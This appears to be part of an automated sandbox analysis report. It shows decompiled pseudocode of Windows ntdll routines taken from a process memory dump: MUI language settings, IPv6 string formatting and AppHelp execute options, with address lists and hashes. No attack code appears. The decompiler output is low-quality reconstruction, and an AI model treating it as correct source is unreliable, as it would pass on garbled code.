                                                                                                                                                        								E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                        								_v52 = _v52 & 0x00000000;
                                                                                                                                                        								_v32 = _v32 & 0x00000000;
                                                                                                                                                        							}
                                                                                                                                                        							if(_v8 != 0) {
                                                                                                                                                        								E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                        							}
                                                                                                                                                        							_v8 = _v8 & 0x00000000;
                                                                                                                                                        							_t318 = 0;
                                                                                                                                                        							goto L46;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_t257 = _v24;
                                                                                                                                                        					_t322 = _t257 + 4;
                                                                                                                                                        					_push(_t257);
                                                                                                                                                        					_v40 = _t322;
                                                                                                                                                        					E01F9718A(_t257);
                                                                                                                                                        					_t338 = _t335 + 4;
                                                                                                                                                        					if(_t322 == _t318) {
                                                                                                                                                        						_v20 = _t318;
                                                                                                                                                        					} else {
                                                                                                                                                        						_v20 = E01F7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                        					}
                                                                                                                                                        					if(_v20 == _t318) {
                                                                                                                                                        						_v40 = _t318;
                                                                                                                                                        						goto L58;
                                                                                                                                                        					} else {
                                                                                                                                                        						E01F72340(_v20, _v8, _v24);
                                                                                                                                                        						_v16 = _v20;
                                                                                                                                                        						_a4 = _t318;
                                                                                                                                                        						_t261 = E01F8E679(_v20, _t332);
                                                                                                                                                        						_t335 = _t338 + 0x14;
                                                                                                                                                        						while(1) {
                                                                                                                                                        							_v12 = _t261;
                                                                                                                                                        							if(_t261 == _t318) {
                                                                                                                                                        								break;
                                                                                                                                                        							}
                                                                                                                                                        							_v12 = _v12 + 2;
                                                                                                                                                        							 *_v12 = 0;
                                                                                                                                                        							E01F7E2A8(_v12,  &_v68, _v16);
                                                                                                                                                        							if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        								_a4 = _a4 + 1;
                                                                                                                                                        							}
                                                                                                                                                        							_v16 = _v12;
                                                                                                                                                        							_t261 = E01F8E679(_v12, _t332);
                                                                                                                                                        							_pop(_t322);
                                                                                                                                                        						}
                                                                                                                                                        						_t269 = _v16;
                                                                                                                                                        						if( *_v16 != _t318) {
                                                                                                                                                        							E01F7E2A8(_t322,  &_v68, _t269);
                                                                                                                                                        							if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        								_a4 = _a4 + 1;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						if(_a4 == _t318) {
                                                                                                                                                        							E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                        							_v40 = _t318;
                                                                                                                                                        							_v20 = _t318;
                                                                                                                                                        						}
                                                                                                                                                        						if(_v8 != _t318) {
                                                                                                                                                        							E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        						}
                                                                                                                                                        						_v8 = _t318;
                                                                                                                                                        						goto L30;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				_t284 = _v24;
                                                                                                                                                        				_t322 = _t284 + 4;
                                                                                                                                                        				_push(_t284);
                                                                                                                                                        				_v48 = _t322;
                                                                                                                                                        				E01F9718A(_t284);
                                                                                                                                                        				_t339 = _t335 + 4;
                                                                                                                                                        				if(_t322 == _t318) {
                                                                                                                                                        					_v28 = _t318;
                                                                                                                                                        				} else {
                                                                                                                                                        					_v28 = E01F7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                        				}
                                                                                                                                                        				if(_v28 == _t318) {
                                                                                                                                                        					_v48 = _t318;
                                                                                                                                                        					goto L58;
                                                                                                                                                        				} else {
                                                                                                                                                        					E01F72340(_v28, _v8, _v24);
                                                                                                                                                        					_v16 = _v28;
                                                                                                                                                        					_a4 = _t318;
                                                                                                                                                        					_t288 = E01F8E679(_v28, _t332);
                                                                                                                                                        					_t335 = _t339 + 0x14;
                                                                                                                                                        					while(1) {
                                                                                                                                                        						_v12 = _t288;
                                                                                                                                                        						if(_t288 == _t318) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						_v12 = _v12 + 2;
                                                                                                                                                        						 *_v12 = 0;
                                                                                                                                                        						E01F7E2A8(_v12,  &_v68, _v16);
                                                                                                                                                        						if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        							_a4 = _a4 + 1;
                                                                                                                                                        						}
                                                                                                                                                        						_v16 = _v12;
                                                                                                                                                        						_t288 = E01F8E679(_v12, _t332);
                                                                                                                                                        						_pop(_t322);
                                                                                                                                                        					}
                                                                                                                                                        					_t296 = _v16;
                                                                                                                                                        					if( *_v16 != _t318) {
                                                                                                                                                        						E01F7E2A8(_t322,  &_v68, _t296);
                                                                                                                                                        						if(E01F95553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                        							_a4 = _a4 + 1;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					if(_a4 == _t318) {
                                                                                                                                                        						E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                        						_v48 = _t318;
                                                                                                                                                        						_v28 = _t318;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v8 != _t318) {
                                                                                                                                                        						E01F7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                        					}
                                                                                                                                                        					_v8 = _t318;
                                                                                                                                                        					goto L17;
                                                                                                                                                        				}
                                                                                                                                                        			}





































                                                                                                                                                        0x01fe1c0e
                                                                                                                                                        0x01fe1c13
                                                                                                                                                        0x01fe1c16
                                                                                                                                                        0x01fe1c16
                                                                                                                                                        0x01fe1bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98b04
                                                                                                                                                        0x01f98a0e
                                                                                                                                                        0x01f98a11
                                                                                                                                                        0x01f98a14
                                                                                                                                                        0x01f98a15
                                                                                                                                                        0x01f98a18
                                                                                                                                                        0x01f98a22
                                                                                                                                                        0x01f98b59
                                                                                                                                                        0x01f98a28
                                                                                                                                                        0x01f98a3c
                                                                                                                                                        0x01f98a3c
                                                                                                                                                        0x01f98a42
                                                                                                                                                        0x01fe1bb0
                                                                                                                                                        0x01fe1b11
                                                                                                                                                        0x01fe1b11
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98a48
                                                                                                                                                        0x01f98a51
                                                                                                                                                        0x01f98a5b
                                                                                                                                                        0x01f98a5e
                                                                                                                                                        0x01f98a61
                                                                                                                                                        0x01f98a69
                                                                                                                                                        0x01f98a69
                                                                                                                                                        0x01f98a6d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98a74
                                                                                                                                                        0x01f98a7c
                                                                                                                                                        0x01f98a7d
                                                                                                                                                        0x01f98a91
                                                                                                                                                        0x01f98a93
                                                                                                                                                        0x01f98a93
                                                                                                                                                        0x01f98a98
                                                                                                                                                        0x01f98a9b
                                                                                                                                                        0x01f98aa1
                                                                                                                                                        0x01f98aa1
                                                                                                                                                        0x01f98aa4
                                                                                                                                                        0x01f98aaa
                                                                                                                                                        0x01f98ab1
                                                                                                                                                        0x01f98ac5
                                                                                                                                                        0x01f98ac7
                                                                                                                                                        0x01f98ac7
                                                                                                                                                        0x01f98ac5
                                                                                                                                                        0x01f98ace
                                                                                                                                                        0x01fe1bc9
                                                                                                                                                        0x01fe1bce
                                                                                                                                                        0x01fe1bd2
                                                                                                                                                        0x01fe1bd2
                                                                                                                                                        0x01f98ad8
                                                                                                                                                        0x01f98aeb
                                                                                                                                                        0x01f98aeb
                                                                                                                                                        0x01f98af0
                                                                                                                                                        0x01f98af4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98af4
                                                                                                                                                        0x01f98a42
                                                                                                                                                        0x01f98926
                                                                                                                                                        0x01f98929
                                                                                                                                                        0x01f9892c
                                                                                                                                                        0x01f9892d
                                                                                                                                                        0x01f98930
                                                                                                                                                        0x01f98935
                                                                                                                                                        0x01f9893a
                                                                                                                                                        0x01f98b51
                                                                                                                                                        0x01f98940
                                                                                                                                                        0x01f98954
                                                                                                                                                        0x01f98954
                                                                                                                                                        0x01f9895a
                                                                                                                                                        0x01fe1b63
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98960
                                                                                                                                                        0x01f98969
                                                                                                                                                        0x01f98973
                                                                                                                                                        0x01f98976
                                                                                                                                                        0x01f98979
                                                                                                                                                        0x01f9897e
                                                                                                                                                        0x01f98981
                                                                                                                                                        0x01f98981
                                                                                                                                                        0x01f98986
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fe1b6e
                                                                                                                                                        0x01fe1b74
                                                                                                                                                        0x01fe1b7b
                                                                                                                                                        0x01fe1b8f
                                                                                                                                                        0x01fe1b91
                                                                                                                                                        0x01fe1b91
                                                                                                                                                        0x01fe1b99
                                                                                                                                                        0x01fe1b9c
                                                                                                                                                        0x01fe1ba2
                                                                                                                                                        0x01fe1ba2
                                                                                                                                                        0x01f9898c
                                                                                                                                                        0x01f98992
                                                                                                                                                        0x01f98999
                                                                                                                                                        0x01f989ad
                                                                                                                                                        0x01fe1ba8
                                                                                                                                                        0x01fe1ba8
                                                                                                                                                        0x01f989ad
                                                                                                                                                        0x01f989b6
                                                                                                                                                        0x01f989c8
                                                                                                                                                        0x01f989cd
                                                                                                                                                        0x01f989d0
                                                                                                                                                        0x01f989d0
                                                                                                                                                        0x01f989d6
                                                                                                                                                        0x01f989e8
                                                                                                                                                        0x01f989e8
                                                                                                                                                        0x01f989ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f989ed
                                                                                                                                                        0x01f9895a
                                                                                                                                                        0x01f9883e
                                                                                                                                                        0x01f98841
                                                                                                                                                        0x01f98844
                                                                                                                                                        0x01f98845
                                                                                                                                                        0x01f98848
                                                                                                                                                        0x01f9884d
                                                                                                                                                        0x01f98852
                                                                                                                                                        0x01f98b49
                                                                                                                                                        0x01f98858
                                                                                                                                                        0x01f9886c
                                                                                                                                                        0x01f9886c
                                                                                                                                                        0x01f98872
                                                                                                                                                        0x01fe1b0e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98878
                                                                                                                                                        0x01f98881
                                                                                                                                                        0x01f9888b
                                                                                                                                                        0x01f9888e
                                                                                                                                                        0x01f98891
                                                                                                                                                        0x01f98896
                                                                                                                                                        0x01f98899
                                                                                                                                                        0x01f98899
                                                                                                                                                        0x01f9889e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fe1b21
                                                                                                                                                        0x01fe1b27
                                                                                                                                                        0x01fe1b2e
                                                                                                                                                        0x01fe1b42
                                                                                                                                                        0x01fe1b44
                                                                                                                                                        0x01fe1b44
                                                                                                                                                        0x01fe1b4c
                                                                                                                                                        0x01fe1b4f
                                                                                                                                                        0x01fe1b55
                                                                                                                                                        0x01fe1b55
                                                                                                                                                        0x01f988a4
                                                                                                                                                        0x01f988aa
                                                                                                                                                        0x01f988b1
                                                                                                                                                        0x01f988c5
                                                                                                                                                        0x01fe1b5b
                                                                                                                                                        0x01fe1b5b
                                                                                                                                                        0x01f988c5
                                                                                                                                                        0x01f988ce
                                                                                                                                                        0x01f988e0
                                                                                                                                                        0x01f988e5
                                                                                                                                                        0x01f988e8
                                                                                                                                                        0x01f988e8
                                                                                                                                                        0x01f988ee
                                                                                                                                                        0x01f98900
                                                                                                                                                        0x01f98900
                                                                                                                                                        0x01f98905
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01f98905

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • WindowsExcludedProcs, xrefs: 01F987C1
                                                                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 01F98914
                                                                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 01F98827
                                                                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 01F989FC
                                                                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 01F987E6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcspbrk
                                                                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                        • API String ID: 402402107-258546922
                                                                                                                                                        • Opcode ID: 36445a910fd79122daf1234caea9788ee5dab5b635d612bb288253d51e220cbc
                                                                                                                                                        • Instruction ID: 6b3011008a13f806903583d462606d5803723c1b1eecc26356ac1ac1fa70605c
                                                                                                                                                        • Opcode Fuzzy Hash: 36445a910fd79122daf1234caea9788ee5dab5b635d612bb288253d51e220cbc
                                                                                                                                                        • Instruction Fuzzy Hash: 3BF1E7B2D00209EFDF11EF99CD84DEEBBB8FF18244F14446AE605A7211E7369A45DB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                        			E01FB13CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                        				char _v8;
                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                        				intOrPtr* _v16;
                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                        				char _v24;
                                                                                                                                                        				intOrPtr _t71;
                                                                                                                                                        				signed int _t78;
                                                                                                                                                        				signed int _t86;
                                                                                                                                                        				char _t90;
                                                                                                                                                        				signed int _t91;
                                                                                                                                                        				signed int _t96;
                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                        				signed int _t114;
                                                                                                                                                        				void* _t115;
                                                                                                                                                        				intOrPtr _t128;
                                                                                                                                                        				intOrPtr* _t129;
                                                                                                                                                        				void* _t130;
                                                                                                                                                        
                                                                                                                                                        				_t129 = _a4;
                                                                                                                                                        				_t128 = _a8;
                                                                                                                                                        				_t116 = 0;
                                                                                                                                                        				_t71 = _t128 + 0x5c;
                                                                                                                                                        				_v8 = 8;
                                                                                                                                                        				_v20 = _t71;
                                                                                                                                                        				if( *_t129 == 0) {
                                                                                                                                                        					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                        						goto L5;
                                                                                                                                                        					} else {
                                                                                                                                                        						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                        						if(_t96 != 0) {
                                                                                                                                                        							L38:
                                                                                                                                                        							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                        								goto L5;
                                                                                                                                                        							} else {
                                                                                                                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                        								_t86 = E01FA7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                        								L36:
                                                                                                                                                        								return _t128 + _t86 * 2;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                        						if(_t114 == 0) {
                                                                                                                                                        							L33:
                                                                                                                                                        							_t115 = 0x1f72926;
                                                                                                                                                        							L35:
                                                                                                                                                        							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                        							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                        							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                        							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                        							_t86 = E01FA7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                        							goto L36;
                                                                                                                                                        						}
                                                                                                                                                        						if(_t114 != 0xffff) {
                                                                                                                                                        							_t116 = 0;
                                                                                                                                                        							goto L38;
                                                                                                                                                        						}
                                                                                                                                                        						if(_t114 != 0) {
                                                                                                                                                        							_t115 = 0x1f79cac;
                                                                                                                                                        							goto L35;
                                                                                                                                                        						}
                                                                                                                                                        						goto L33;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L5:
                                                                                                                                                        					_a8 = _t116;
                                                                                                                                                        					_a4 = _t116;
                                                                                                                                                        					_v12 = _t116;
                                                                                                                                                        					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                        						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                        							_v8 = 6;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_t90 = _v8;
                                                                                                                                                        					if(_t90 <= _t116) {
                                                                                                                                                        						L11:
                                                                                                                                                        						if(_a8 - _a4 <= 1) {
                                                                                                                                                        							_a8 = _t116;
                                                                                                                                                        							_a4 = _t116;
                                                                                                                                                        						}
                                                                                                                                                        						_t91 = 0;
                                                                                                                                                        						if(_v8 <= _t116) {
                                                                                                                                                        							L22:
                                                                                                                                                        							if(_v8 < 8) {
                                                                                                                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                        								_t128 = _t128 + E01FA7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                        							}
                                                                                                                                                        							return _t128;
                                                                                                                                                        						} else {
                                                                                                                                                        							L14:
                                                                                                                                                        							L14:
                                                                                                                                                        							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                        								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                        									_push(":");
                                                                                                                                                        									_push(_t71 - _t128 >> 1);
                                                                                                                                                        									_push(_t128);
                                                                                                                                                        									_t128 = _t128 + E01FA7707() * 2;
                                                                                                                                                        									_t71 = _v20;
                                                                                                                                                        									_t130 = _t130 + 0xc;
                                                                                                                                                        								}
                                                                                                                                                        								_t78 = E01FA7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                        								_t130 = _t130 + 0x10;
                                                                                                                                                        							} else {
                                                                                                                                                        								_push(L"::");
                                                                                                                                                        								_push(_t71 - _t128 >> 1);
                                                                                                                                                        								_push(_t128);
                                                                                                                                                        								_t78 = E01FA7707();
                                                                                                                                                        								_t130 = _t130 + 0xc;
                                                                                                                                                        								_t91 = _a8 - 1;
                                                                                                                                                        							}
                                                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                                                        							_t128 = _t128 + _t78 * 2;
                                                                                                                                                        							_t71 = _v20;
                                                                                                                                                        							if(_t91 >= _v8) {
                                                                                                                                                        								goto L22;
                                                                                                                                                        							}
                                                                                                                                                        							_t116 = 0;
                                                                                                                                                        							goto L14;
                                                                                                                                                        						}
                                                                                                                                                        					} else {
                                                                                                                                                        						_t108 = 1;
                                                                                                                                                        						_v16 = _t129;
                                                                                                                                                        						_v24 = _t90;
                                                                                                                                                        						do {
                                                                                                                                                        							if( *_v16 == _t116) {
                                                                                                                                                        								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                        									_a4 = _v12;
                                                                                                                                                        									_a8 = _t108;
                                                                                                                                                        								}
                                                                                                                                                        								_t116 = 0;
                                                                                                                                                        							} else {
                                                                                                                                                        								_v12 = _t108;
                                                                                                                                                        							}
                                                                                                                                                        							_v16 = _v16 + 2;
                                                                                                                                                        							_t108 = _t108 + 1;
                                                                                                                                                        							_t26 =  &_v24;
                                                                                                                                                        							 *_t26 = _v24 - 1;
                                                                                                                                                        						} while ( *_t26 != 0);
                                                                                                                                                        						goto L11;
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        			}




















                                                                                                                                                        0x01fde95e
                                                                                                                                                        0x01fde963
                                                                                                                                                        0x01fde970
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fde975
                                                                                                                                                        0x01fde93b
                                                                                                                                                        0x01fde980
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fde980
                                                                                                                                                        0x01fde942
                                                                                                                                                        0x01fde94b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fde94b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fde942
                                                                                                                                                        0x01fb13f4
                                                                                                                                                        0x01fb13f4
                                                                                                                                                        0x01fb13f9
                                                                                                                                                        0x01fb13fc
                                                                                                                                                        0x01fb13ff
                                                                                                                                                        0x01fb1406
                                                                                                                                                        0x01fde9cc
                                                                                                                                                        0x01fde9d2
                                                                                                                                                        0x01fde9d2
                                                                                                                                                        0x01fde9cc
                                                                                                                                                        0x01fb140c
                                                                                                                                                        0x01fb1411
                                                                                                                                                        0x01fb1431
                                                                                                                                                        0x01fb143a
                                                                                                                                                        0x01fb143c
                                                                                                                                                        0x01fb143f
                                                                                                                                                        0x01fb143f
                                                                                                                                                        0x01fb1442
                                                                                                                                                        0x01fb1447
                                                                                                                                                        0x01fb14a8
                                                                                                                                                        0x01fb14ac
                                                                                                                                                        0x01fde9e2
                                                                                                                                                        0x01fde9e7
                                                                                                                                                        0x01fde9ec
                                                                                                                                                        0x01fdea05
                                                                                                                                                        0x01fdea05
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb1449
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb1449
                                                                                                                                                        0x01fb144c
                                                                                                                                                        0x01fb1459
                                                                                                                                                        0x01fb1462
                                                                                                                                                        0x01fb1469
                                                                                                                                                        0x01fb146a
                                                                                                                                                        0x01fb1470
                                                                                                                                                        0x01fb1473
                                                                                                                                                        0x01fb1476
                                                                                                                                                        0x01fb1476
                                                                                                                                                        0x01fb1490
                                                                                                                                                        0x01fb1495
                                                                                                                                                        0x01fb138e
                                                                                                                                                        0x01fb1390
                                                                                                                                                        0x01fb1397
                                                                                                                                                        0x01fb1398
                                                                                                                                                        0x01fb1399
                                                                                                                                                        0x01fb13a1
                                                                                                                                                        0x01fb13a4
                                                                                                                                                        0x01fb13a4
                                                                                                                                                        0x01fb1498
                                                                                                                                                        0x01fb149c
                                                                                                                                                        0x01fb149f
                                                                                                                                                        0x01fb14a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb14a4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb14a4
                                                                                                                                                        0x01fb1413
                                                                                                                                                        0x01fb1415
                                                                                                                                                        0x01fb1416
                                                                                                                                                        0x01fb1419
                                                                                                                                                        0x01fb141c
                                                                                                                                                        0x01fb1422
                                                                                                                                                        0x01fb13b7
                                                                                                                                                        0x01fb13bc
                                                                                                                                                        0x01fb13bf
                                                                                                                                                        0x01fb13bf
                                                                                                                                                        0x01fb13c2
                                                                                                                                                        0x01fb1424
                                                                                                                                                        0x01fb1424
                                                                                                                                                        0x01fb1424
                                                                                                                                                        0x01fb1427
                                                                                                                                                        0x01fb142b
                                                                                                                                                        0x01fb142c
                                                                                                                                                        0x01fb142c
                                                                                                                                                        0x01fb142c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x01fb141c
                                                                                                                                                        0x01fb1411

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2401175570.0000000001F60000.00000040.00000001.sdmp, Offset: 01F50000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.2401169723.0000000001F50000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401300979.0000000002040000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401307735.0000000002050000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401316865.0000000002054000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401325561.0000000002057000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401340077.0000000002060000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000009.00000002.2401403634.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                        • Opcode ID: 6fe006eee20a098f87056e25465380a5e665925468db0c82b608cb242f4191f3
                                                                                                                                                        • Instruction ID: 6e99f4016531e3197ac3f5201a1bb906c38dd8c00db239319ca448c35e9acf78
                                                                                                                                                        • Opcode Fuzzy Hash: 6fe006eee20a098f87056e25465380a5e665925468db0c82b608cb242f4191f3
                                                                                                                                                        • Instruction Fuzzy Hash: 1F6165B1D04606EACB24DF5ED8E08FFBBB6EF95300718C12EE5D647541E23AA640CB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E01FA7EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				char _v540;
                                                                                                                                                        				unsigned int _v544;
                                                                                                                                                        				signed int _v548;
                                                                                                                                                        				intOrPtr _v552;
                                                                                                                                                        				char _v556;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t33;
                                                                                                                                                        				void* _t38;
                                                                                                                                                        				unsigned int _t46;
                                                                                                                                                        				unsigned int _t47;
                                                                                                                                                        				unsigned int _t52;
                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                        				unsigned int _t62;
                                                                                                                                                        				void* _t69;
                                                                                                                                                        				void* _t70;
                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                        				signed int _t73;
                                                                                                                                                        				void* _t74;
                                                                                                                                                        				void* _t75;
                                                                                                                                                        				void* _t76;
                                                                                                                                                        				void* _t77;
                                                                                                                                                        
                                                                                                                                                        				_t33 =  *0x2052088; // 0x777e1dd7
                                                                                                                                                        				_v8 = _t33 ^ _t73;
                                                                                                                                                        				_v548 = _v548 & 0x00000000;
                                                                                                                                                        				_t72 = _a4;
                                                                                                                                                        				if(E01FA7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                        					__eflags = _v548;
                                                                                                                                                        					if(_v548 == 0) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					_t62 = _t72 + 0x24;
                                                                                                                                                        					E01FC3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                        					_t71 = 0x214;
                                                                                                                                                        					_v544 = 0x214;
                                                                                                                                                        					E01F7DFC0( &_v540, 0, 0x214);
                                                                                                                                                        					_t75 = _t74 + 0x20;
                                                                                                                                                        					_t46 =  *0x2054218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                        					__eflags = _t46;
                                                                                                                                                        					if(_t46 == 0) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					_t47 = _v544;
                                                                                                                                                        					__eflags = _t47;
                                                                                                                                                        					if(_t47 == 0) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					__eflags = _t47 - 0x214;
                                                                                                                                                        					if(_t47 >= 0x214) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					_push(_t62);
                                                                                                                                                        					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                        					E01FC3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                        					_t52 = E01F80D27( &_v540, L"Execute=1");
                                                                                                                                                        					_t76 = _t75 + 0x1c;
                                                                                                                                                        					_push(_t62);
                                                                                                                                                        					__eflags = _t52;
                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                        						E01FC3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                        						_t71 =  &_v540;
